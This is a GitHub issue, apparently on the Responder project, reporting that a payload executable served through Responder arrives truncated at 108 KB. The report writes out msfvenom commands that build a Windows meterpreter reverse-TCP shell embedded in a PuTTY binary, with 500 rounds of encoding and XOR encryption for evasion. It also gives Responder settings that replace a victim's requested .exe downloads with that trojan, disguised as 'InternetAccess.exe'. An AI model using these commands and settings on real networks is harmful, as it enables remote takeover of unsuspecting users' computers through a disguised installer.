Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

payload exe file download truncate? #277

Open
wmagliano opened this issue May 6, 2024 · 0 comments
Open

payload exe file download truncate? #277

wmagliano opened this issue May 6, 2024 · 0 comments

Comments

@wmagliano
Copy link

  1. Payload
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=8443 -f exe -a x64 -o putty-68-64-8443.exe --platform windows -x putty-68-64.exe -e x64/xor_dynamic -i 500 --encrypt xor --encrypt-key S3C43ts

  2. Configure Responder.conf
    ; Set to On to replace any requested .exe with the custom EXE
    Serve-Exe = On

; Set to On to serve the custom HTML if the URL does not contain .exe
; Set to Off to inject the 'HTMLToInject' in web pages instead
Serve-Html = On

; Custom HTML to serve
HtmlFilename = /mnt/AccessDenied.html

; Custom EXE File to serve
ExeFilename = /mnt/putty-68-64-8443.exe

; Name of the downloaded .exe that the client will see
ExeDownloadName = InternetAccess.exe

  1. When you download via Reponder the size is truncated to 108Kb

Only when you try a payload like this... woks
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.115 LPORT=8443 -f exe -a x64
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@wmagliano